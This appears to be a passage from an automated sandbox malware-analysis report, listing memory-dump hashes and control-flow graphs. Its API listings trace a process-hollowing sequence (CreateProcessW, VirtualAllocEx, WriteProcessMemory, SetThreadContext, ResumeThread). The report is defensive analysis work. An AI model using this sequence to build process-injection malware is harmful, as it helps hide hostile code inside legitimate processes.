                                • Instruction ID: bc171ac0a3131ae1450c73426602a8a14664e9cc75e371079d056166d99e00ce
                                • Opcode Fuzzy Hash: 04336d66980d4acb75d1dc2d911747780f9cc540742818b90470e56df3c938b7
                                • Instruction Fuzzy Hash: CC21A130A05208DFCB49EFB8C5453AEBBF5EF85300F1084AAD5099B281DF308E45CB81
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d4f739469eda3dd594541ba366b2a793147fb2460fb3c89890a166d6f5f6fa1
                                • Instruction ID: 806455cedcd356aae1b5ba83bdbd7ed5581fe17ba0c5652c8feb2beb41df2a7e
                                • Opcode Fuzzy Hash: 8d4f739469eda3dd594541ba366b2a793147fb2460fb3c89890a166d6f5f6fa1
                                • Instruction Fuzzy Hash: D7211A341193568FDB03FF28F8909457FB6FB81E057009AA5D448AF26ED7706A4ACF81
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 872eedf2b49284e5ca3021486c12277b4a2754e0a61fe49e6b031657eeeb964a
                                • Instruction ID: 49bb27870999b974bfde6e665ef1139a84a31d062025b875abf73b4ea2bcb081
                                • Opcode Fuzzy Hash: 872eedf2b49284e5ca3021486c12277b4a2754e0a61fe49e6b031657eeeb964a
                                • Instruction Fuzzy Hash: E011CB3451931A8FDB06FF28F8C0A497BB6F784E05B009A64D448AF21DD7706E4ACF81
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 61d6a8be3f693fdce1fb3a412c2350f3d3274aea1ad1487d6013eb3f007e2c56
                                • Instruction ID: 35005fefebe485863d5a5ad31e2aefad57794809a1aeb66477c13ad0f7017ee0
                                • Opcode Fuzzy Hash: 61d6a8be3f693fdce1fb3a412c2350f3d3274aea1ad1487d6013eb3f007e2c56
                                • Instruction Fuzzy Hash: 0D5152346007418FDB09FB78E86896E7BF2BB856413008A79D41B8B275EF349D49DF85
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3c2fdca3a02ba9037713b1fc5b5ebe3875dbd38ecf6bef7829e429ab7dc44325
                                • Instruction ID: d3531eaa3fbff9e449baf1c96b367f3d2bd74eb2cc3472fe3a2ca9bb1ef0dcbb
                                • Opcode Fuzzy Hash: 3c2fdca3a02ba9037713b1fc5b5ebe3875dbd38ecf6bef7829e429ab7dc44325
                                • Instruction Fuzzy Hash: D69181347003058FDB09EB78E868A6E7BF2BF896417108569D40ADB3B5EF349D09DB85
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a60f29bb1eb76074ee519be8c787f018a21c8fabd3e52e20fa5dc2275f28a14d
                                • Instruction ID: 1df542926a58a7178d7389a86fc2d1b88c407d6322fb35940b4213e78c47ac77
                                • Opcode Fuzzy Hash: a60f29bb1eb76074ee519be8c787f018a21c8fabd3e52e20fa5dc2275f28a14d
                                • Instruction Fuzzy Hash: BA31A131300B008BDB59BB79982862E76E2BFC46553408A6DC41BCB790DF39DE049FD6
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d1974137a10e9f7eaa8a9d9c3cc18a73ecf782847f032029623895be295f815
                                • Instruction ID: 5feab3c857dda2fac52fd2219d119661b7f5524057bc04516a120743a3117ac2
                                • Opcode Fuzzy Hash: 5d1974137a10e9f7eaa8a9d9c3cc18a73ecf782847f032029623895be295f815
                                • Instruction Fuzzy Hash: 4B318E74A00309DFDB45EBB8D954AADBBB2FFC8200F104569D406A7365DB306A45DB91
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a49fd5b59b3996a3194ce2f002d73d71c39e15ef92a48275615315b26613c683
                                • Instruction ID: f4e880ec0de3ee276ec9c863cd7eeff6b25e751d248249a4c9a03547b26f09c8
                                • Opcode Fuzzy Hash: a49fd5b59b3996a3194ce2f002d73d71c39e15ef92a48275615315b26613c683
                                • Instruction Fuzzy Hash: ED21A161B002049BDB48EBB9481836FBAEAEFC9641B10842DD84BD7381DE388C0597A1
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aa504bd64ee077f7772034f6762e9065a4a518c8ef7a38a07de66d2c0691d970
                                • Instruction ID: c14a205656d63899b4256b48da270adaa8b840cc0f56a9d3ec0e99c8db56e199
                                • Opcode Fuzzy Hash: aa504bd64ee077f7772034f6762e9065a4a518c8ef7a38a07de66d2c0691d970
                                • Instruction Fuzzy Hash: B1219F74A00309DFDB44FBB8D844AADBBB2FFC8300F104669D406A7364DB305A45DB91
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: da1982ef8578a5a14884b3f8b3ac52ef449c576be5754fdd2d9dcff2cfdb89a1
                                • Instruction ID: a4abbf1a77c643e8787593f1e80c8a6ad775daa0e6923319c1e183fb402fedbd
                                • Opcode Fuzzy Hash: da1982ef8578a5a14884b3f8b3ac52ef449c576be5754fdd2d9dcff2cfdb89a1
                                • Instruction Fuzzy Hash: 3421D130A04248DFDB58EBB8D855BAE7BF1EF85340F1080ADD44ADB286EB749E44C791
                                Memory Dump Source
                                • Source File: 00000011.00000002.1735706361.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_bc0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2693bf34a217fba9b7b3313f57bf28782c31879f040f33fff2bab99708d8ba8e
                                • Instruction ID: b75284492af252f5a01df3e119f09d59090048c589d590738e4661790cc0d631
                                • Opcode Fuzzy Hash: 2693bf34a217fba9b7b3313f57bf28782c31879f040f33fff2bab99708d8ba8e
                                • Instruction Fuzzy Hash: 1611893461135A9FDB02FF2CF990E497BA5F7D4606B009A54D4048B27DEB70694FAF81
                                Memory Dump Source
                                • Source File: 00000012.00000002.1736881598.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_2da0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e7671e22858bbf2f1d2c69299668b51c5f987b05918aab1a0a4853444efcf318
                                • Instruction ID: 567dea278b8a95a836a2da5df37881e5bf45f0bbd9b572c33c255ba19120e7cf
                                • Opcode Fuzzy Hash: e7671e22858bbf2f1d2c69299668b51c5f987b05918aab1a0a4853444efcf318
                                • Instruction Fuzzy Hash: 7F5146756403068FCB95FF74E4A856E7BA2BFC82017418A29D426CB398EF309D09DB91
                                Memory Dump Source
                                • Source File: 00000012.00000002.1736881598.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_18_2_2da0000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3c241867cfe057b51d98ba661b1f4d29f7b273c6477616a0c38d7cdb2752b622
                                • Instruction ID: 92ca14d083bdb3cf2cb8fe4319516a4514c50a03154f3a005e59e0f2606bb16d

                                Execution Graph

                                Execution Coverage:29.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:42
                                Total number of Limit Nodes:4
                                execution_graph 3789 c54e40 3790 c54ecd CreateProcessW 3789->3790 3792 c55026 3790->3792 3792->3792 3801 c571d0 3802 c571ea 3801->3802 3803 c57239 3802->3803 3806 c5727c 3802->3806 3810 c57288 3802->3810 3808 c57288 3806->3808 3814 c5614c 3808->3814 3809 c574af 3809->3802 3811 c572bb 3810->3811 3812 c5614c CreateProcessW 3811->3812 3813 c574af 3812->3813 3813->3802 3815 c57ce8 CreateProcessW 3814->3815 3817 c57ece 3815->3817 3818 c520f0 VirtualAllocEx 3819 c521a7 3818->3819 3793 c51ec8 3794 c51f26 3793->3794 3795 c51f3b Wow64SetThreadContext 3793->3795 3794->3795 3796 c51f84 3795->3796 3797 c51ba8 3798 c51c35 CreateProcessW 3797->3798 3800 c51d8e 3798->3800 3820 c55f98 3821 c55fb2 3820->3821 3822 c56001 3821->3822 3824 c56450 3821->3824 3826 c56483 3824->3826 3828 c54024 3826->3828 3827 c56677 3827->3821 3829 c56eb0 CreateProcessW 3828->3829 3831 c57096 3829->3831 3831->3831 3832 c51fd8 ReadProcessMemory 3833 c52097 3832->3833 3834 c521f8 3835 c52276 WriteProcessMemory 3834->3835 3836 c52261 3834->3836 3837 c522d8 3835->3837 3836->3835 3838 c52338 ResumeThread 3839 c523c0 3838->3839

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 672 c55c6c-c55d03 673 c55d05-c55d17 672->673 674 c55d1a-c55d28 672->674 673->674 675 c55d3f-c55d7b 674->675 676 c55d2a-c55d3c 674->676 677 c55d7d-c55d8c 675->677 678 c55d8f-c55e5c CreateProcessW 675->678 676->675 677->678 682 c55e65-c55f24 678->682 683 c55e5e-c55e64 678->683 693 c55f26-c55f4f 682->693 694 c55f5a-c55f65 682->694 683->682 693->694 697 c55f66 694->697 697->697
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C55E49
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 645 c54e34-c54ecb 646 c54ee2-c54ef0 645->646 647 c54ecd-c54edf 645->647 648 c54f07-c54f43 646->648 649 c54ef2-c54f04 646->649 647->646 650 c54f45-c54f54 648->650 651 c54f57-c55024 CreateProcessW 648->651 649->648 650->651 655 c55026-c5502c 651->655 656 c5502d-c550ec 651->656 655->656 666 c55122-c5512d 656->666 667 c550ee-c55117 656->667 671 c5512e 666->671 667->666 671->671
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C55011
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 699 c54024-c56f3b 701 c56f52-c56f60 699->701 702 c56f3d-c56f4f 699->702 703 c56f77-c56fb3 701->703 704 c56f62-c56f74 701->704 702->701 705 c56fb5-c56fc4 703->705 706 c56fc7-c57094 CreateProcessW 703->706 704->703 705->706 710 c57096-c5709c 706->710 711 c5709d-c5715c 706->711 710->711 721 c57192-c5719d 711->721 722 c5715e-c57187 711->722 726 c5719e 721->726 722->721 726->726
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00C57081
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 727 c5614c-c57d73 729 c57d75-c57d87 727->729 730 c57d8a-c57d98 727->730 729->730 731 c57daf-c57deb 730->731 732 c57d9a-c57dac 730->732 733 c57ded-c57dfc 731->733 734 c57dff-c57ecc CreateProcessW 731->734 732->731 733->734 738 c57ed5-c57f94 734->738 739 c57ece-c57ed4 734->739 749 c57f96-c57fbf 738->749 750 c57fca-c57fd5 738->750 739->738 749->750 754 c57fd6 750->754 754->754
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00C57EB9
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 782 c57cdc-c57d73 784 c57d75-c57d87 782->784 785 c57d8a-c57d98 782->785 784->785 786 c57daf-c57deb 785->786 787 c57d9a-c57dac 785->787 788 c57ded-c57dfc 786->788 789 c57dff-c57ecc CreateProcessW 786->789 787->786 788->789 793 c57ed5-c57f94 789->793 794 c57ece-c57ed4 789->794 804 c57f96-c57fbf 793->804 805 c57fca-c57fd5 793->805 794->793 804->805 809 c57fd6 805->809 809->809
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00C57EB9
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 755 c56ea4-c56f3b 756 c56f52-c56f60 755->756 757 c56f3d-c56f4f 755->757 758 c56f77-c56fb3 756->758 759 c56f62-c56f74 756->759 757->756 760 c56fb5-c56fc4 758->760 761 c56fc7-c57094 CreateProcessW 758->761 759->758 760->761 765 c57096-c5709c 761->765 766 c5709d-c5715c 761->766 765->766 776 c57192-c5719d 766->776 777 c5715e-c57187 766->777 781 c5719e 776->781 777->776 781->781
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00C57081
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 810 c51b9c-c51c33 812 c51c35-c51c47 810->812 813 c51c4a-c51c58 810->813 812->813 814 c51c6f-c51cab 813->814 815 c51c5a-c51c6c 813->815 816 c51cad-c51cbc 814->816 817 c51cbf-c51d8c CreateProcessW 814->817 815->814 816->817 821 c51d95-c51e54 817->821 822 c51d8e-c51d94 817->822 832 c51e56-c51e7f 821->832 833 c51e8a-c51e95 821->833 822->821 832->833 837 c51e96 833->837 837->837
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C51D79
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 838 c51ba8-c51c33 839 c51c35-c51c47 838->839 840 c51c4a-c51c58 838->840 839->840 841 c51c6f-c51cab 840->841 842 c51c5a-c51c6c 840->842 843 c51cad-c51cbc 841->843 844 c51cbf-c51d8c CreateProcessW 841->844 842->841 843->844 848 c51d95-c51e54 844->848 849 c51d8e-c51d94 844->849 859 c51e56-c51e7f 848->859 860 c51e8a-c51e95 848->860 849->848 859->860 864 c51e96 860->864 864->864
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C51D79
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 892 c55c78-c55d03 893 c55d05-c55d17 892->893 894 c55d1a-c55d28 892->894 893->894 895 c55d3f-c55d7b 894->895 896 c55d2a-c55d3c 894->896 897 c55d7d-c55d8c 895->897 898 c55d8f-c55e5c CreateProcessW 895->898 896->895 897->898 902 c55e65-c55f24 898->902 903 c55e5e-c55e64 898->903 913 c55f26-c55f4f 902->913 914 c55f5a-c55f65 902->914 903->902 913->914 917 c55f66 914->917 917->917
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C55E49
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 865 c54e40-c54ecb 866 c54ee2-c54ef0 865->866 867 c54ecd-c54edf 865->867 868 c54f07-c54f43 866->868 869 c54ef2-c54f04 866->869 867->866 870 c54f45-c54f54 868->870 871 c54f57-c55024 CreateProcessW 868->871 869->868 870->871 875 c55026-c5502c 871->875 876 c5502d-c550ec 871->876 875->876 886 c55122-c5512d 876->886 887 c550ee-c55117 876->887 891 c5512e 886->891 887->886 891->891
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C55011
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C522C6
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C522C6
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C52085
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C52085
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C52195
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C52195
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C51F72
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C51F72
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 00C523AE
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 00C523AE
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                Memory Dump Source
                                • Source File: 00000017.00000002.1822898919.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_a70000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c5b814377e5ee82e9bf972e36cdff57c9b900cee64f439a5967007da48db622b
                                • Instruction ID: 606ab51d1459da24244a97639cd83657ccb65675555b1d519a5843bd15cc6484
                                • Opcode Fuzzy Hash: c5b814377e5ee82e9bf972e36cdff57c9b900cee64f439a5967007da48db622b
                                • Instruction Fuzzy Hash: EB117A382013169FDB62FB18F980E5977A6BBB6605F009A5494088B23DE774690FEF81
                                Memory Dump Source
                                • Source File: 00000018.00000002.1824477066.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12f0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b84a434a9ead0b79b469fe87efef3983cbaa36f07cf815838e979bd3181b8d3
                                • Instruction ID: 68510c3da4cfc3a82a34c147902b8ca6759df3f4df1e926704aa18441c39a4d0
                                • Opcode Fuzzy Hash: 5b84a434a9ead0b79b469fe87efef3983cbaa36f07cf815838e979bd3181b8d3
                                • Instruction Fuzzy Hash: BE513A356003498FDB16FB78E95857EBBA6BF842017008A2DD406CB3A5EF749D05EF81
                                Memory Dump Source
                                • Source File: 00000018.00000002.1824477066.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12f0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f86c0f188f427c3eb10afcd5baa6ba2d83c2ff2da158c1b481a03e1554017d3a
                                • Instruction ID: 83e17dafdd257bb162f7db18a3c894513b289f3b4a8c3530abeaab603825cfc8
                                • Opcode Fuzzy Hash: f86c0f188f427c3eb10afcd5baa6ba2d83c2ff2da158c1b481a03e1554017d3a
                                • Instruction Fuzzy Hash: 16918D357003098FCB05EB78E958A7E7BB6BFC8601B104569E506CB3A5EF749D05EB81
                                Memory Dump Source
                                • Source File: 00000018.00000002.1824477066.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12f0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1017ff523c564852639eac7b43e24374c1f7ae7db40c205b9225e88e58605dcb
                                • Instruction ID: 9c7dfcdc03cb0b583e38dceca08b40d475e474da4cbdfca3cb1566024a014649
                                • Opcode Fuzzy Hash: 1017ff523c564852639eac7b43e24374c1f7ae7db40c205b9225e88e58605dcb
                                • Instruction Fuzzy Hash: 8931B0313007498BDB58BB79982827EB6E3BFC45047408A2ED11BCB790DF749E04ABD2
                                Memory Dump Source
                                • Source File: 00000018.00000002.1824477066.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12f0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c6488c38cb899a755886e815f7a9a89ea0b7a27091d9cbf86b9e6dfc1560246
                                • Instruction ID: 54d90e89d398c1e8ca32d4369a447204de40419cbfd3b8cea639a9864f8a4eb0
                                • Opcode Fuzzy Hash: 5c6488c38cb899a755886e815f7a9a89ea0b7a27091d9cbf86b9e6dfc1560246
                                • Instruction Fuzzy Hash: B4317A75E00309DFDB45EFB8D9446ADBBB2BF89300F104A69D402AB355EB345E44CB52
                                Memory Dump Source
                                • Source File: 00000018.00000002.1824477066.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12f0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0c66d84f717dcfaf0c85d4ed0721fe82884681cccb9b8c0cdf22e76338ab8204
                                • Instruction ID: 28c4fb8b8e529163f48b7dac490675bdc7f205cef958f3b9d5583a5405878b61
                                • Opcode Fuzzy Hash: 0c66d84f717dcfaf0c85d4ed0721fe82884681cccb9b8c0cdf22e76338ab8204
                                • Instruction Fuzzy Hash: 2C219361B003459FDB14EBBA481936FF9EBEFC9640B15842DD94BD7381DE348D0157A2
                                Memory Dump Source
